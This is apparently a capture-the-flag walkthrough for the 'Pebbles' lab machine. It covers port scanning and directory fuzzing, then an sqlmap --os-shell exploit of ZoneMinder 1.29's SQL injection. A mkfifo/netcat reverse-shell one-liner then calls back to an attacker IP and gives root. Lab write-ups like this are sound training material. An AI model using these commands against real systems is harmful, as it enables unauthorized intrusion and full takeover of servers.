PG - Pebbles Walkthrough¶
TLDR
- Fuzz directory to find application which is vulnerable to SQLi
- Exploit the vulnerable application using SQLMap to get shell
Enumeration¶
Port Scan¶
Start with a basic TCP scan on the target.
$ nmap $ip --top-port 1000 -T4 -vv
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
80/tcp open http syn-ack
3305/tcp open odette-ftp syn-ack
8080/tcp open http-proxy syn-ack
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)
| 256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)
|_ 256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pebbles
3305/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Apache Tomcat
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tomcat
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Directory Fuzzing¶
Since, we have a web service running at port 80. We will use gobuster for directory discovery.
$ gobuster dir -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50| tee gobuster.txt
images (Status: 301) [Size: 317] [--> http://192.168.245.52/images/]
css (Status: 301) [Size: 314] [--> http://192.168.245.52/css/]
javascript (Status: 301) [Size: 321] [--> http://192.168.245.52/javascript/]
zm (Status: 301) [Size: 313] [--> http://192.168.245.52/zm/]
/zm directory, we find that ZoneMinder console is running on the server. And its version is 1.29.0.
Seachsploit¶
Quick serach using searchsploit will give us following result:
$ searchsploit zoneminder 1.29
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery | php/webapps/41239.txt
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Exploit DB | Zoneminder 1.29/1.30 - XSS / SQLi / CSRF
Exploitation¶
SQLmap¶
Run SQLmap with following Command:
sqlmap http://$ip/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" --os-shell
[10:26:06] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
[10:26:24] [INFO] retrieved:
root
command standard output: 'root'
os-shell>
os-shell> which nc
[10:28:15] [INFO] retrieved: /bin/nc
command standard output: '/bin/nc
Getting a Reverse Shell¶
Since the target machine has nc installed. We will be using it to get a reverse shell connection. Start a netcat listener on your machine and run the following command.
# change the ip and port according to your need
os-shell> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.79 3305 >/tmp/f
$ nc -nvlp 3305
listening on [any] 3305 ...
connect to [192.168.49.79] from (UNKNOWN) [192.168.79.52] 45580
/bin/sh: 0: can't access tty; job control turned off
# whoami
Root
# which python3
/usr/bin/python3
# python3 -c 'import pty;pty.spawn("/bin/bash")'
root@pebbles:/var/lib/mysql# cd
cd
root@pebbles:~# ls
ls
proof.txt
root@pebbles:~# cat proof.txt
cat proof.txt
<Flag_Redacted>
root@pebbles:~#
root user there is no need for privilege escalation.